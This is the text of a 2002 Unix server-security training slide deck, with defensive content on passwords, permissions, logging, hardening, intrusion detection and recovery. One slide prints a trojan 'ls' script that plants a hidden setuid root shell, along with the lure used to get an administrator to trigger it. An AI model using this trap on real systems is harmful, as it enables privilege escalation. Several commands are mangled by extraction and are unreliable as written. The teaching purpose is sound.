资源描述
, , , , , ,*,Server management and security,September 10, 2002,Ko, YangWoo,ccTLD name server training,1,Note,Contents are NOT mine. Most of them are from the wonderful book “,Practical Unix and Internet Security,” and “,Real World Linux Security”,.,Others are extracted from various good resources including;,Linux Security FAQ,Solaris Security FAQ,Sun Solaris / HP-UX / Tru64 Unix man pages,2,Table of contents,Before we start,Security basics,Unix / Linux sever security,System setup guide,Detection,Recovery,3,Module 1 : Before we start,4,Welcome to wild Internet !,Quote from Crypto-Gram (June 15, 2001 ),A random computer on the Internet is scanned dozens of times a day. The life expectancy of a default installation of Red Hat 6.2 server, or the time before someone successfully hacks it, is less than 72 hours. A common home user setup,with Windows 98 and enabled, was,hacked five times in four days,. Systems are subjected to NetBIOS scans an average of 17 times a day. And the fastest time for a server being hacked:,15 minutes after plugging,it into the network.,5,No system is ever perfectly secure.,6,But, still we need security.,Any number of toolkits exist that allow total amateurs to become holy terrors.,The good news is that if you can beat the popular intrusion toolkits, 90 percent of the bad guys will go bother somebody else whos less secure.,7,System security in a page,The Seven Most Deadly Sins,Weak Passwords,Open Network Ports,Old Software Version,Poor Physical Security,Insecure CGIs,Stale and Unnecessary Accounts,Procrastination,8,Module 2 : Security basics,9,Security requirements,Confidentiality,Integrity,Authentication,Non-repudiation,Availability,Access control,Combined,User authentication used for access control,Non-repudiation combined with authentication,10,Some terminologies,System security / network security,Passive attack / active attack,sniffing / spoofing,Two models,Access control,discretionary access control vs. mandatory access control,Audit,11,Security policy,Simple and generic policy for system which users can readily understand and follow.,Starting point :,That which is not permitted is prohibited.,Setup steps,(1) Identify what you are trying to protect.,(2) Determine what you are trying to protect it from.,(3) Determine how likely the threats are.,(4) Implement measures which will protect your assets in a cost-effective manner.,(5) Review & improve the process continuously,12,Security policy (continued),References,rfc2196 : Site Security Handbook,Samples,13,Module 3 : Unix / Linux server security,Password,Superuser,Account,Integrity,Log and Audit,Programmed threats,TCP/IP,14,Module 3-1 : Password,15,Bad passwords,Your name, spouses name, partners name, pets name, childs name, friends name, bosss name,Operating system, hostname, username,Phone number, license plate number, birth date, social security number,Words in the dictionary,Simple patterns of letters on the keyboard (qwerty),Passwords of all the same letter,Any of above spelled backwards,Any of above followed or prepended by a single digit,Password,16,Good passwords,Have both uppercase and lowercase letters.,Have digits and/or punctuation characters as well as letters.,May include some control characters and/or spaces.,Are easy to remember, so they do not have to be written down.,Are seven or eight characters long.,Password,17,The Thompson Test,Devised by Ken Thompson,Cracking algorithm,One to six ASCII characters,Seven or eight lowercase letters,Any word from a large dictionary such as hangman-words, or a word spelled backward or with the digit “1” instead of the letter “l”, with the digit “0” instead of the letter “o”, or with the digit “3” instead of the letter “e”.,Any pair of words from a large dictionary or words spelled backwards.,Password,18,Module 3-2 : Superuser,19,Who is superuser ?,UID of 0,Any username can be the superuser.,Normal security checks and constraints are ignored for the superuser.,Superuser is not for casual use.,Do not login as superuser, use /bin/su with “-” option instead.,Superuser,20,Simple trap to steal superuser,Premise,Roots PATH starts with “.”,Contents of shell script ls,#!/bin/sh,cp /bin/sh ./junk/.ss,chmod 4555 ./junk/.ss,rm f $0,exec /bin/ls $1+”$”,Set a trap,% cd,% chmod 700 .,% touch ./-f,To do is just say to administrator. “I have a funny my directory I cant seem to delete.”,Superuser,21,Several tricks for superusers,Test complex commands in a non-destructive way before running it.,rm foo*.bar “after” echo foo*.bar,alias rm=rm i,Only become root to do single specific task. Stay normal user shell until you are sure what needs to be done by root.,Command path,Minimum and trusted directories only,Never include “.”,No writable directories,Superuser,22,Several tricks for superusers (continued),Never use r-utilities (e.g. rlogin, rsh). Never create .rhosts for for the root.,No login from the remote,Linux, HPUX : /etc/securetty,lists ttys from which root can log in,Solaris : /etc/default/login,CONSOLE=/dev/console,Always be slow and deliberate running as root. Think before you type.,Superuser,23,Module 3-3 :,24,-rwxr-r-,- : plain file,d : directory,c : character device (tty, printer),b : block device (disk, CD-ROM),l : symbolic link,s : socket,=, p : FIFO,Access granted to owner,r : read / w : write / x : execute,Access granted to,group member,Access granted to,others,25,SUID/SGID/sticky bits,SUID (set uid),Processes are granted access to system resources based on user who,owns,the file.,SGID (set gid),(For file) Same with SUID except group is affected.,(For directory) Files created in that directory will have their group set to the directorys group.,sticky bit,If set on a directory, then a user may only delete files that the he owns or for which he has explicit write permission granted, even when he has write access to the directory. (e.g. /tmp ),26,tips,Finding SUID and SGID Files,# find / ( -local -o -prune ) ( -perm -004000 -o -perm -002000 ) -type f -print,( xdev can be used in place of local/prune),Files without associated owner/group can be a signal of compromise.,# find / -nouser o nogroup print,Users are not allowed to have .rhosts file.,# find /home name .rhosts -print,27,tips (continued),Turning off SUID / SGID in mounted,use nosuid (and nodev if possible) when mounting remote or allowing users to mount floppies or CD-ROMs,Device be created as a backdoor after compromise.,# find / ( -local -o -prune ) ( -type c -o -type b ) -exec ls -l ;,28,Critical system files,These files should be backed up and compared with saved version frequently.,/etc/passwd, /etc/shadow, /etc/group,/etc/rc*,/etc/ttys, /etc/ttytab, /etc/inittab,/usr/lib/crontab, /usr/spool/cron/crontabs/, /etc/crontab,/usr/lib/aliases,/etc/exports, /etc/dfs/dfstab,/etc/netgroups,/etc/fstab, /etc/vfstab,/etc/inetd.conf,UUCP related files,29,Module 3-4 : Account,30,Dangerous accounts,Accounts without passwords,# cat /etc/passwd | awk -F: length($2) /tmp/users1$,cat-passwd | /bin/awk F: print $1 | /bin/sort u /tmp/users2$,/bin/comm 13 /tmp/users12$,/bin/rm f /tmp/users12$,Account,33,Module 3-5 : Integrity,34,Simple examples,By metadata,# cat /usr/adm/ | xargs ls -ilds /tmp/now,# diff -b /usr/adm/savelist /tmp/now,By checksum,# find cat /usr/adm/ -ls -type f -exec md4 ; /tmp/now,# diff -b /usr/adm/savelist /tmp/now,Integrity,35,Tripwire,Tripwire is a tool that checks to see what has changed on your system. The program monitors key attributes of files that should not change, including binary signature, size, expected change of size, etc.,Where is it ?,Commercial version :,For Linux user :,For Unix user :,Integrity,36,Tripwire tutorial in a slide,Initial setup,download / build / install it,modify policy file (e.g. remove unnecessary files),# vi /etc/tripwire/twpol.txt,generate policy file,# twadmin create-pol,build initial database,# tripwire init,check periodically,# tripwire check,reconcile differences (e.g. software installation),# tripwire update accept-all twrfile,report_file,Integrity,37,Module 3-6 : Log and audit,38,Basics,Consider remote logging to secure log data.,List of log files,acct / pacct : Commands run by users,aculog : Dial-out modem (acu : automatic call unit),lastlog : Most recent login success/fail times,loginlog : Bad login attempts,messages : Console / syslog facility,sulog : su command,utmp / utmpx : Each user currently logged in,wtmp / wtmpx : Login/out, shutdown/startup,xferlog :,Log and audit,39,Files and commands,lastlog file,lastlog (Linux only),Displays last login time and location.,u/wtmp file,last,Displays login and logout information about users and terminals,acct/pacct file,(Solaris 5.8) /usr/lib/acct/startup , shutacct,Starts or stop accounting.,(Solaris 5.8) acctcom, lastcom,Displays the recent commands executed.,Log and audit,40,Monitoring logs,logcheck (logsentry),Extracts anything that might indicate a security violation or other abnormality, and informs via e-mail.,Log and audit,41,Module 3-7 : Programmed threats,42,Basic terms,Bug vs. malware (or malicious software),Kinds of malwares,Security tools and toolkits,Back doors and trap doors,Logic bombs,Viruses,Worms,Trojan horses,Bacteria and rabbits,Programmed threats,43,Against programmed threats,Back door,Do regular integrity check.,Install software only from well-known sources.,Separate test bed and production system.,Trojan horse,Never execute anything until youre sure of program or inputs to program.,Never run anything as root unless you absolutely must.,Programmed threats,44,Against programmed threats (continued),Viruses,Use same techniques used against back doors and Trojan horse.,Dont include nonstandard directories (including .) in your PATH.,Dont leave common binary directories unprotected and set permission of commands to 555 or 511.,Make sure your own directories are writable only by you not by your group or world.,Programmed threats,45,Against programmed threats (continued),Worm,Prevention,If an intruder can enter your machine, so can a worm program.,If under attack,Call computer incident response center to se if other sites have made similar reports.,Isolate your server to prevent spread.,Programmed threats,46,Module 3-8 : TCP/IP,47,Vulnerabilities,ftp,Passwords are sent in plain text.,/etc/,List of accounts that are NOT allowed to use ftp.,telnet,Passwords are sent in plain text.,Attacker can hijack the session.,TCP/IP,48,Vulnerabilities (continued),smtp (sendmail),Must be upgraded 8.9.3 or higher. Current version is 8.12.6.,Check permission of /var/spool/mqueue, sendmail.cf, /etc/aliases*, /etc/mail/mailertable* (owned by root, writable by owner only),TCP/IP,49,Vulnerabilities (continued),Sun RPC portmapper,Assigns the TCP/UDP ports used for RPC.,To improve security, turn it off if possible. Or,Replace it with Wietse Venemas version.,Block packets on port 111.,rexec, rsh, rlogin,Executes remote program or login.,rexec transmits plain text password and rsh/rlogin use “trusted host/user” concept.,Disable rexec, and replace rsh/rlogin with ssh.,TCP/IP,50,Vulnerabilities (continued),web,Yet another BIG topic. See references;,Lincoln D. Steins FAQ,Paul Phillips CGI security FAQ,NCSAs CGI security documentation,TCP/IP,51,Vulnerabilities (continued),NFS,Limit exported and mounted,Export read-only and use root ownership,Remove group-write permission for files and directories,Do not export server executables and home directories,Do not allow users to log into server,Use fsirand and set the portmon variable,Use showmount e,Use secure NFS,TCP/IP,52,Vulnerabilities (continued),tftp (UDP 69),No security at all.,finger ( 79 ),Provides user information.,POP ( 109, 110 ),Username/password is sent in plain text.,TCP/IP,53,Module 4 : System setup guide,54,Useful links for system setup,Solaris,Solaris/Unix Security Checklist Version 1.0,The Solaris Security FAQ,Linux,Securing Debian Manual,55,System setup steps (1/2),Disconnect system from network.,Install a minimal Operating System.,Install the recommended patches.,Use BIOS/EEPROM security.,Securing root account,Force root to login through,su,.,Check environments,default mask (027), PATH,Apply hardening script if available.,Direct,syslog,to,loghost,56,System setup steps (2/2),Create minimal accounts and disallow login.,Let minimal services run;,/etc/,rc,*, /etc/,inet,.d,Use,tcpwrapper,for network services.,Install Secure Shell and encourage its use.,Install integrity checker (e.g. Tripwire).,Test it periodically,e.g.,Nessus, COPS, Tiger, ,Monitor it forever,Check logs, login/outs, commands,57,Module 5 : Detection,Monitoring,Scanning,Handling,58,Monitoring (1/2),Log (logcheck),Propagate it using loghost and e-mail.,Check it.,Network port (netstat),Trojan horse may use network ports.,Network (tcpdump),Monitoring,59,Monitoring (2/2),Process (ps),Check suspicious processes, e.g. compiler.,Record typical size of daemons and important programs to detect Trojan horse.,Load (uptime),Monitoring,60,Scanning,Find suspicious files.,Run Tripwire.,Detect promiscuous network interfaces.,(see next page),Scanning,61,Perl script to detect sniffer,#!/usr/bin/perl,my $ifconfig = “/sbin/ifconfig”;,my $recips = ;,my %PROMISC = ();,my $interface = “”;,open( IFCONFIG, “$ifconfig|” ) | die( “Error: cannot run ifconfig!” );,while( ) ,$interface = $1 if m/(S+)/;,$PROMISC$interface = 1 if m/promisc/I;,close( IFCONFIG );,if( %PROMISC ) ,open( MAIL, “|Mail s Promisc mode $recips” ) | die( “Error: cannot send mail” );,print MAIL “Interfaces in Promisc mode: “, join( “ “, sort keys %PRMISC), “n”;,close MAIL;,Scanning,62,Handling incidents,Dont panic,Is it really a security incident ?,Was any damage really done ?,Evidence or normal operation, that is the question.,Document,Write down everything you find, always noting the date and time.,Plan ahead !,Handling,63,Module 6 : Recovery,Regaining control of system,Finding and repairing the damage,Tracing attacker,64,Regaining control of system,Operate as an unprivileged user.,Check integrity of commands used.,Have stealth version of crucial commands (ps / ls / tar / ),Build from open source. Or,Rename from existing binary,cd /home/larry/bin,cp /bin/ls monthly,cat text_file monthly,(echo ls is monthly; md5sum monthly) | lpr,Process must be kill by 9.,TCP/IP,Regaining control of system,65,Analyze Trojan horse,Save suspicious executables on (removable) media.,Analyze,strings Trojan,if not stripped,nm Trojan (see function names, syscalls),run debugger (see stack trace),Check files opened by Trojan,(Linux) /proc/pid/fd,(Solaris) p,Regaining control of system,66,Prevent further damage,Drop connection (unplug LAN, modem),Shutdown abruptly,Close database,Run sync (from non privileged user),Press reset (or power) button,Boot again,Remove the system disk from the compromised system and connect it as second disk to a secure system. (Or, boot from secure boot floppy.),Run,fsck,Before coming up multi-user mode, check cracker generated email.,Regaining control of system,67,Checking logs,Log files,/var/log/*,Shell history files (esp. for root),Mailboxes (mbox, /?/spool/mail, /?/spool/mqueue),Firewall logs, ISPs log,tcpwrapper log (denied log only),Other files,/tmp/*,Hidden directories (e.g. /home/*/.?*),Other files started with “.”,Finding and repairing the damage,68,Finding cracker-altered files,Use tools (e.g. Tripwire),Compare with backups.,GNU tar “-d” option is very useful.,Rename any Trojan horse found something obvious.,mv /mnt2/tmp/ls /mnt/tmp/ls-CRACKED,chmod 0 /mnt/tmp/ls-CRACKED,Find normal files hidden in /dev,find /dev type f ls,Find set UID programs,Finding and repairing the damage,69,Useful commands,With IP address (A.B.C.D),nslookup type=any D.C.B.A.in-addr.arpa,dig x A.B.C.D,With domain name,whois,Using ping,See the distance,Using traceroute,Tracing hacker,70,Module 7 : D.I.Y.,Requirement,Analysis,Plan and Do,71,What assets do I have ?,Classification of assets,Hardware,Server / PC / Storage device / Printer,Network,Network distribution component (e.g. router, hub, switch),Network service host (e.g. directory, NMS),Network connection / Cabling,Data (e.g. database, agreement, policy, guideline),Software,Human,Environment (e.g. UPS, air conditioner, cabinet),Requirement,72,How valuable they are ? (1/4),Review documentations,List of all servers,List of all security products in place,Operation guidelines,Interview with operational personnel,Valuation methods,CIA,Confidentiality / Integrity / Availability,Cost of loss,Requirement,73,How valuable they are ? (2/4),Confidentiality,5 : Top secret,4 : Secret,3 : Limited,2 : Limited within organization,Ordinary documents,1 : Open,Requirement,74,How valuable they are ? (3/4),Integrity,5 : Critical damage to operation,1 : No (or very least) damage to operation,Availability,5 : Non stop,4 : Recovery within 4 hours,3 : Recovery within 8 hours,2 : Recovery within 12 hours,1 : Recovery within 24 hours,Requirement,75,How valuable they are ? (4/4),Cost of loss,5 : Serious loss (e.g. Bankruptcy),4 : Major loss (e.g. Discontinuance of some businesses),3 : Significant loss (e.g. Discontinuance of some tasks),2 : Loss (e.g. U$ 10,000),1 : Trivial loss (e.g. U$ 1,000),Requirement,76,Define analysis areas,Network / system security,Service daemons,Backdoors, vulnerable files,Misuse by users,User accounts,Log management,Network configuration,Network device management,Database security,Physical security,Security management,Compliance assessment,Security policy assessment,Contingency planning,Requirement,77,Analysis,Automated analysis,e.g. Nessus,Manual analysis,OS checklists,Analysis,78,Sample results,Service daemons,Problems,Some old-version daemons have buffer overflow vulnerabilities.,Unnecessary daemons are running.,To do,Remove unnecessary daemons.,Keep necessary daemon up to date.,Run security scanner periodically.,Analysis,79,Sample results,Backdoors, vulnerable files,Problems,Backdoor is not found, but there is no counter measure for future backdoors.,To do,Install and run Tripwire periodically.,Analysis,80,Sample results,Misuse by users,Problems,Sendmails vulnerability can lead to root compromise.,To do,Remove if unnecessary.,Keep it up to date if necessary.,Analysis,81,Sample results,User accounts,Problems,Super user accounts are shared by administrators and developers.,Weak passwords are found.,To do,Define each systems usages clearly.,
展开阅读全文